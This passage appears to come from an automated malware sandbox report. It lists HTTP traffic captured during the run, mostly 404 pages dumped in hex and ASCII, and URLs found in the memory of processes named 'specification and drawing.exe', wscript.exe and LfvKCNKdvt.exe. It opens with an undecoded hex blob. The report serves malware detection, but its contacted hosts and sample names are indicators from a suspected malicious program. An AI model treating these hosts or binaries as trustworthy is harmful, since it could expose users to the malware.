13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 13:38:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 36 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:38:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:38:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:38:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:38:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 02 Dec 2024 13:40:33 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-02T13:40:38.8801182Z
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bj%2FhUPlA8uq5yAyuZjDrV2m8Maf1noh2zh%2FEkSNIIo86l%2FuVuM4B%2BwREoHQOzzvaevROgvaeLhdansIE0nH0VlE%2B5eFe%2B7wu9ZiCoLNJc%2FiEa%2B0Aw6bneun38fR7H%2Fwei1Usw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbbb28bb180f53-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 66 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 69 74 65 6d 61 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 Data Ascii: 1fb4<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://giganet.ua/ru
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inau.ua/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://partner.mirohost.net
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://schema.org/Organization
                      Source: specification and drawing.exe, 00000000.00000002.2178181816.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
